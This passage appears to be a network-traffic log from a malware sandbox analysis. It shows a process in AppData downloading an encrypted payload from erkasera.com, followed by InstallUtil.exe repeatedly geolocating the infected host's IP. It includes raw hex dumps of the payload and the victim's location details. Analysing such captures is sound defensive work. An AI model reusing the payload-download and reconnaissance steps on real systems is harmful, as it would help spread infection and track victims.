2024-10-25 19:27:18 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	188.132.193.46	443	2188	C:\Users\user\AppData\Roaming\Id.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:18 UTC	82	OUT	GET /seuias/Mfevxcugo.dat HTTP/1.1 Host: erkasera.com Connection: Keep-Alive
2024-10-25 19:27:18 UTC	207	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Fri, 25 Oct 2024 11:23:19 GMT accept-ranges: bytes content-length: 952328 date: Fri, 25 Oct 2024 19:27:01 GMT
2024-10-25 19:27:18 UTC	16384	IN	Data Raw: 79 58 6b 25 f0 47 3b 43 7f 9b 86 32 f0 69 c9 83 ee 44 b4 92 cb ed 58 9f 10 96 57 ab 00 79 c4 ff 79 3b 19 8f 5e 6f c7 c8 2a 4c 82 22 5a 46 2c 9a 87 32 7d 56 50 f3 ac 7f 31 a0 15 e1 e1 67 cf 24 56 e1 79 10 d0 db c2 9a 5f a8 6e 6d c3 8a f3 98 54 dd 01 77 ed c5 ce c4 1e 7c 12 4a fe 70 d6 b1 df 86 9a 8d a9 dd 46 43 f6 24 48 f8 1d 84 9d ff 89 5c 48 be bd 19 b6 92 58 f6 8e 30 07 1e 91 3d 7e 73 c7 4c b9 99 9a 32 34 ea 19 b5 f8 d9 ee bb 91 33 f2 a3 19 b7 5d ff 56 f8 5a 11 e0 7a 27 d4 b0 44 1d 41 65 d7 0c 5d c4 e2 e5 60 07 e4 05 64 60 9c c0 49 e2 1f 0b 4c 19 16 41 2f 63 97 c2 68 4c 46 a7 30 a6 d2 c4 49 ce 88 a9 22 b0 43 61 19 4f d6 64 5c e2 38 6e 6c c3 c7 9a a4 12 be 52 ce 83 ab 71 ca 18 0f 3d 79 47 fd 5e e3 1e 9a 1c 8a 63 e2 77 0d ef 78 28 8f 20 4c 30 48 38 18 22 Data Ascii: yXk%G;C2iDXWyy;^o*L"ZF,2}VP1g$Vy_nmTw\|JpFC$H\HX0=~sL243]VZz'DAe]`d`ILA/chLF0I"CaOd\8nlRq=yG^cwx( L0H8"
2024-10-25 19:27:18 UTC	16384	IN	Data Raw: 93 b3 66 f0 ec da 1f 41 0a 96 f6 8d 96 b3 56 dd db 83 97 4f 02 2a 1a 35 60 f9 dc 65 88 59 bb 83 50 b9 c0 f2 4d 4b 52 4d a4 82 4b e6 5f 3b ef 07 e6 d8 07 b8 dd b3 2b 11 ba 05 32 4a d0 45 b0 b5 85 be c0 67 d1 50 e4 8a 85 93 41 03 3d ae af 92 be 57 81 e1 60 dd f8 71 56 fa 59 df 9f ed 06 a0 3d c9 92 d0 24 9b 7b 24 ab c6 e7 14 78 51 3d bd a4 98 e1 3c ee d4 2c 8d a8 76 e8 39 1a 66 c4 dc 78 1e cc b7 90 9c 45 c2 e1 57 e4 96 bb d3 05 ba 8e 91 1a ea 07 98 08 6c 0e a1 2f 4e e4 9f df 37 c4 23 6d 07 2f db ac 4f 4c 3b 60 0b 6b e3 e2 9c c6 18 25 76 c5 62 59 5f 83 c1 fd 45 74 dc 0f 70 d4 50 35 02 a8 97 ee b2 d7 f1 66 bd 69 9f a7 17 2e 02 f1 53 c5 42 90 23 60 10 12 18 3f 3b 6a 1a da 2b ac a3 c5 74 83 5b 78 93 e9 52 7f b7 bd a3 d2 75 1c 81 f0 a5 f7 be 03 b3 62 ef f8 c2 18 Data Ascii: fAVO*5`eYPMKRMK_;+2JEgPA=W`qVY=${$xQ=<,v9fxEWl/N7#m/OL;`k%vbY_EtpP5fi.SB#`?;j+t[xRub
2024-10-25 19:27:18 UTC	16384	IN	Data Raw: 29 50 a8 c6 10 6e bf be dc 98 5f 7e 89 06 cd 2d 9e 21 e8 7c cf 5a 04 b6 4e 19 d9 10 25 ac a6 8a 4b 73 de 2f 95 88 2a d6 42 42 0d 1c 3b eb 4d b6 83 ff aa b6 75 c8 d6 7d 0d f1 20 a1 2f 75 46 a8 a0 b1 34 2b fc 00 12 a0 6f 2f 9f 2a 7e f8 10 95 35 3c 05 c9 23 28 2a 5d f1 e2 81 de ee a4 c0 50 f4 42 87 ed 7b 24 cb f7 15 b4 07 f7 a2 33 13 ab 05 b6 19 c7 12 81 e5 c6 43 5a 4f 69 05 35 86 66 de e3 56 2c 78 48 4c a7 38 79 60 73 4b 0e aa 19 86 83 7d e2 34 c9 af 00 c4 0d ac c6 9b d5 ea fb 1a 85 40 cb ea 38 1b 33 4a 1a fe 20 bf 57 fc 40 9c a9 b2 aa 9b 3a ee a2 39 84 30 d6 66 6f 17 d6 90 14 7e 1c 32 75 a4 52 ed f4 04 c8 30 a3 d3 2e b2 c0 27 77 48 e8 50 a0 3d 80 17 59 ef 11 12 bc c1 d3 a9 0f 8b e9 7d d6 79 cf a9 12 74 1d ab 4c 55 67 30 d4 2b 3b 3c 68 dd d0 1d 86 d3 0b fb Data Ascii: )Pn_~-!\|ZN%Ks/BB;Mu} /uF4+o/~5<#(*]PB{$3CZOi5fV,xHL8y`sK}4@83J W@:90fo~2uR0.'wHP=Y}ytLUg0+;<h
2024-10-25 19:27:19 UTC	16384	IN	Data Raw: 23 ea b0 a5 c0 7c de f9 ae 63 71 d2 86 29 98 d3 0a ef 72 d5 0c 3a 14 14 2e c3 5d 35 bc ce f9 13 3b df aa c8 7d 5d ea 97 fc 0f d4 fa 75 b8 34 3c 9d aa 88 91 1a 63 97 e6 e7 e0 50 c2 50 d2 3f 02 f6 85 0a 52 0f f5 e5 b4 76 8b 99 69 6a f0 13 63 46 5f 98 a9 98 b6 52 b0 85 17 45 2f 41 58 7a dd 14 b0 df 60 0d 09 7f 08 6b 7f ae f2 25 47 63 7e c4 66 30 31 8e 83 c8 10 4d 57 52 41 d9 32 cb 4b 07 55 80 6a 67 83 4c 4f 24 b3 f5 4f bb e3 45 0d 28 47 b4 62 01 e6 bd f4 db 6a 05 e4 72 e0 14 d7 9a 17 a0 70 c3 cf 28 fd 15 7d e0 58 df 1a 2e cc 51 c7 d8 a8 5a 53 f0 de 5a c9 92 1e 52 bb e5 f5 2c 17 2f 6c d6 c0 fb 12 53 ae 3b 7f 58 1b 4a 98 24 c6 5e 13 9b 76 53 c4 dc ac ae 70 94 91 68 e4 ec 8a 5f 60 8b df 11 8b 3a b0 fe 2b ef 23 6f a9 cd ff 41 18 3b a9 6b e8 00 5a b3 e1 9f 08 b4 Data Ascii: #\|cq)r:.]5;}]u4<cPP?RvijcF_RE/AXz`k%Gc~f01MWRA2KUjgLO$OE(Gbjrp(}X.QZSZR,/lS;XJ$^vSph_`:+#oA;kZ
2024-10-25 19:27:19 UTC	16384	IN	Data Raw: f7 72 50 3e cd de 78 43 af 0c 22 10 e9 4f ff 03 eb dc b0 6f ff 5b 8b d4 66 7f 82 55 92 26 b8 7c bf e1 ed b2 71 3e 1d 9b f2 ce 7f ec 38 f8 77 c6 48 57 57 04 60 83 bb 4f 45 48 ad b8 bd 92 9d 4a 95 d7 f8 e5 7d 29 65 2f 09 71 6e 23 3c c5 bc 05 f0 6f 2d 29 f0 b7 0c d3 f0 0f c3 ab da d0 ed 75 81 4b 63 41 ac 5d 33 fd 68 86 ca 99 68 69 bc f1 4f 52 56 30 de e9 95 62 bd 3e 34 b3 31 96 51 ed 48 95 89 26 ed eb 24 17 42 3b c4 6a d3 c5 62 15 7e 37 e4 7a a5 74 05 b6 c4 df 39 0c b0 0c ca fe b3 99 97 a0 93 6d 92 ea f0 f2 d1 25 53 ea c1 ae 45 c8 2d 4d 31 de 52 47 03 66 21 b6 39 a7 52 40 b5 67 ac 05 1a 0f 19 91 df ad 2f 03 e2 88 b3 ed 85 98 d5 68 ad 57 15 fe 0b b8 b1 13 c2 4a fa 0f af 98 ad 51 9b 3a 6f 8a ce 59 11 1b ec a7 f3 63 24 f1 0f cf cb ee 54 fe b8 c9 a9 1e f0 7f 99 Data Ascii: rP>xC"Oo[fU&\|q>8wHWW`OEHJ})e/qn#<o-)uKcA]3hhiORV0b>41QH&$B;jb~7zt9m%SE-M1RGf!9R@g/hWJQ:oYc$T
2024-10-25 19:27:19 UTC	16384	IN	Data Raw: 9c 7e f8 d0 33 b9 34 28 cd e4 b0 0f 37 79 39 b8 92 7c 6e d4 71 2b fa b3 67 30 15 4d f0 5c 80 82 e7 6a 9f 98 73 b8 f1 f8 f0 36 5c ac a9 77 06 61 7f f7 99 09 6f db 0c 71 ee fe 27 bc e8 fb 27 81 4b 8a d3 61 76 67 53 8f 15 7d 74 00 f9 72 10 78 18 a4 d9 ec 67 10 ee 6b 77 df 0d 81 6c f5 60 54 eb 2b 62 bf 8f 75 06 c0 30 53 ba 12 72 55 a8 56 b8 f4 79 72 7d 8a 1e 4f 5a 0e 40 b3 9c 29 c2 b2 1e 0a 05 e7 21 d6 65 4a a0 c8 42 46 40 16 c4 6e 14 b3 d4 9d bc 96 56 2c 74 78 56 11 bc 6a 58 6a d3 7c b1 30 11 d0 86 c0 8f bf c3 a3 71 26 63 02 bc b4 12 1e 5d 6b 1b 63 06 19 10 23 82 91 e0 67 90 20 b9 5e 3f 95 db d5 3d ca d2 d8 7c 60 ab fe 14 fc bd 9b ce 37 67 4c 18 fc 99 4a fb 2b 61 18 f4 4d ee 46 77 37 b4 a2 e4 fa 5a ca 79 cd 2f 78 de e6 51 e8 d9 ff 1d 60 e6 b9 8d 6c d4 78 ed Data Ascii: ~34(7y9\|nq+g0M\js6\waoq''KavgS}trxgkwl`T+bu0SrUVyr}OZ@)!eJBF@nV,txVjXj\|0q&c]kc#g ^?=\|`7gLJ+aMFw7Zy/xQ`lx
2024-10-25 19:27:19 UTC	16384	IN	Data Raw: f1 68 ef 34 8d 70 09 88 26 d3 ee 67 a0 b5 cf 79 91 27 41 51 01 f9 30 af 12 21 0f 75 74 d3 99 12 6e bc b3 ea ad 81 65 ab 1f 47 c8 ce 82 9e 6b bb c9 51 ea be 11 70 95 4e 65 94 c8 e5 20 7b ed 27 c3 a9 b3 84 8b 79 02 8b 9f b0 01 ef f4 80 8b 11 cb 99 bc f8 6c a2 3e 44 72 c5 f3 d7 16 22 6a b4 0f ad db ef 4e 93 e8 5d bb 37 dc bf 5b 4c e2 a5 83 27 85 c8 b5 09 bd 47 23 61 4f bb fc 2e 77 6a c1 dc 6f bb 46 b7 1d 31 fd 07 3b 31 f7 3f 8a 0a ac cf 29 d1 de 4d 55 8a 84 35 99 57 47 e0 97 13 76 3a 15 bb 93 26 55 d4 33 c8 43 f7 92 0f 1b cc 8b 33 85 ee 15 e0 0f 2b 79 45 aa f0 7d 6d b3 77 fd 18 05 64 02 2b 0b 34 2f 46 b8 7a 9e 8c 55 73 77 76 55 05 a6 8f c6 d2 20 61 cc ba 28 c4 85 09 ba e2 36 b4 70 be 59 70 47 35 bf 0b e4 26 13 e6 bf e7 8a 02 5c 1a e6 27 42 7d 8e 1e d5 48 6b Data Ascii: h4p&gy'AQ0!utneGkQpNe {'yl>Dr"jN]7[L'G#aO.wjoF1;1?)MU5WGv:&U3C3+yE}mwd+4/FzUswvU a(6pYpG5&\'B}Hk
2024-10-25 19:27:19 UTC	16384	IN	Data Raw: ae 2f 14 44 10 98 6b 6b db 6c b7 f8 f8 a0 18 2a 9e 2e c6 84 2b 21 ed 54 cb e4 e8 8e c8 59 59 b8 a9 73 a7 08 26 02 8d da f7 c2 98 85 1c e4 1f 13 47 4a a2 04 a5 3a af 51 7d 94 27 04 c6 20 8e c7 5b 4c 63 2e b7 2f 6c 4b ca 5c 7d f3 b8 e8 8e 2e 8c 84 e7 3b 01 5b 41 37 e2 81 88 10 14 b3 9c 22 e5 b7 d7 27 cc e0 3b 64 38 8d df 2a d4 dc 5c 68 5d 9a d6 a7 68 59 25 be 8a 7c a7 f8 c4 81 43 08 26 84 22 26 00 28 9a 16 52 89 85 b4 19 dd e6 f0 fc 4e 47 fb 19 61 f4 79 57 b5 53 61 38 24 40 98 71 5a a9 f5 cd 3b 9c a2 eb d1 12 bf 10 4c f0 1b 86 fb c7 a7 c8 75 5a 40 1d 17 84 26 86 b3 6a a5 77 62 4c a0 28 91 35 ab 04 8f 13 df 53 d5 b2 fa 2f a6 4d 0d 3c 70 3a 5e 6b b2 33 98 4a a6 c2 61 8a 11 83 89 8f 0b a3 74 95 68 71 08 87 10 95 14 14 d8 56 01 6d 21 0b 29 09 ca 8a 45 3c 90 49 Data Ascii: /Dkkl.+!TYYs&GJ:Q}' [Lc./lK\}.;[A7"';d8\h]hY%\|C&"&(RNGayWSa8$@qZ;LuZ@&jwbL(5S/M<p:^k3JathqVm!)E<I
2024-10-25 19:27:19 UTC	16384	IN	Data Raw: 7d 09 45 35 39 ca 88 b2 88 6d c5 76 e1 1e 08 51 99 1f ca a6 3d 6b 09 b6 97 b1 15 78 40 ac 35 60 72 d4 88 ff 20 85 35 9a f1 90 b8 72 69 43 e6 9a f9 e9 bc 79 20 91 89 5d e6 d7 de 9b cc e3 83 e5 91 6e 10 d9 75 c1 3b eb c1 02 2a 70 d1 33 11 8a e2 cb e3 42 90 8d cc a0 48 a5 62 50 73 ca 14 84 8b 03 a0 24 09 5b 2d 6c 7b 8c d7 4c a3 b0 5b 21 ed 48 6e 6f ee 63 93 36 a9 c4 b9 44 f2 9d 0e d5 33 42 34 18 58 c4 fa 4a 1b e5 1f 96 7c eb 2b 70 ec 09 e4 4f c0 55 fd b4 84 f4 f0 e0 de 14 e5 04 53 36 2f bf 5a 7f 6c 4e b2 aa 3b 74 c6 76 20 af cf dc 87 29 54 f5 ae 76 91 ea 7d d4 a6 7c 47 b2 24 a2 a0 65 b0 0c f7 0c d1 d0 9e 33 e3 58 f4 62 3f a6 9c a1 3e 47 83 47 2e dd 0e 00 88 f1 4a 2a 89 eb 52 da 12 f0 05 bf f5 90 19 ce 53 36 a9 ab a7 2e d0 d3 b8 be 6b 21 3e c0 65 ae bb 82 29 Data Ascii: }E59mvQ=kx@5`r 5riCy ]nu;p3BHbPs$[-l{L[!Hnoc6D3B4XJ\|+pOUS6/ZlN;tv )Tv}\|G$e3Xb?>GG.JRS6.k!>e)
2024-10-25 19:27:19 UTC	16384	IN	Data Raw: b0 17 a3 ed 7b 82 37 f6 53 21 32 2a d5 2f 39 7f 97 c8 48 20 f6 90 d8 4b d4 e6 6a 54 89 dd 3f cd a4 7d c1 e1 4e 03 00 9a ae 60 dc c4 3b 96 af f0 83 4f ef 7d c9 0f b5 fe 5c 82 c8 97 c6 88 56 fb a9 7c 7d 24 45 0b 16 8c b5 53 62 75 07 d8 6d e9 64 b9 65 fd 15 e9 fa 18 41 60 a5 01 d0 d1 2a 47 51 1f 16 69 87 52 1d 09 5d 9d 05 9e f1 8f ba 02 74 23 b4 0b d2 11 5a 7b 37 38 de 53 5e 3c d6 f8 76 e5 5a 6b 15 a7 b2 be 26 56 47 d6 be 24 46 97 f5 78 62 86 3b 8e 32 c5 5a 20 03 25 35 2f cc 6c 41 18 c5 8b 0a c3 de 33 ff 1f a5 f8 f7 ad f8 a4 ff 91 56 99 52 df af 7a 8a a4 e0 cd 4e bf e1 30 5e 06 7e 4e f3 e3 07 85 57 db e6 ea bf 22 e6 07 0d a3 19 38 56 01 04 d2 2c 80 47 42 01 0d f6 f9 1e fb ef fd 36 5f a2 09 1a 81 db ea 9a a0 32 d7 21 2b af 52 46 d3 bd 2d 01 65 0f bc a3 0b 83 Data Ascii: {7S!2/9H KjT?}N`;O}\V\|}$ESbumdeA`GQiR]t#Z{78S^<vZk&VG$Fxb;2Z %5/lA3VRzN0^~NW"8V,GB6_2!+RF-e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	188.114.97.3	443	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:24 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:24 UTC	898	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44120 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HjKtHZhdgpsTs6Rv%2Fhb1ui4tx%2BtWJDrjpWPKM0wEJmzl5v4X8sPCrvLXdzH8z5kDRgKoIdR%2BAUW7JSft8cL%2Fts0XWmN%2BIIzdurOnhsov9f4VaznagcLlMdOm4ihVg4fOPTT9tlht"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a8ffd072c98-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1395&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2052445&cwnd=238&unsent_bytes=0&cid=e8afb6448d0c843d&ts=231&x=0"
2024-10-25 19:27:24 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49755	188.114.97.3	443	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:25 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 19:27:25 UTC	895	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44121 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=buApW7vqxf%2F0jWQK1p5cmu4MNgZuz8n9njfWaRVsTFsUAYairNM754lVFJh1gxVSsjIcQCs%2FhuIm%2BTjQdtn73lMtVKKyjRQE3ygAeevq%2BZZKoGVOd0uxw2Ku8ry9zgEO90flu8G0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a95ddd76ba7-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1956756&cwnd=68&unsent_bytes=0&cid=9ffda0c9545648e8&ts=156&x=0"
2024-10-25 19:27:25 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49757	188.114.97.3	443	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:26 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:26 UTC	891	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44122 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RAFLxp9mMFo%2BwlWDEq1pvOWg0t26O8lPexFRYLXA3FRxFDEhNPRF1yHW1eQnTEZsBm8rSvREiv4APsF2NyiKqnhT0VI2mKAZcxrTp0j2zlUkiGgwXx4SzvPlo2%2Bwyw9sjBeV8D2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a9ec861c871-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1642&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1870801&cwnd=97&unsent_bytes=0&cid=9efcf962d993e0c8&ts=161&x=0"
2024-10-25 19:27:26 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49759	188.114.97.3	443	4192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:27 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:28 UTC	896	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44123 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K24yJDcJfXs7PN%2BqVWO3jFlk0naqCuuLUJQW5%2FSy34OZYq4S4fQ3Ty4fiazA9Y0k7%2Fv2PhB5ePa0JfqoHnZ6FEs%2BYIO6PleOkpVn4iJRxAAoZXLpaN6x7L2FEexUdpYKXlAu82mu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849aa7aab5e587-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2529257&cwnd=251&unsent_bytes=0&cid=529593a2dd413fe5&ts=162&x=0"
2024-10-25 19:27:28 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

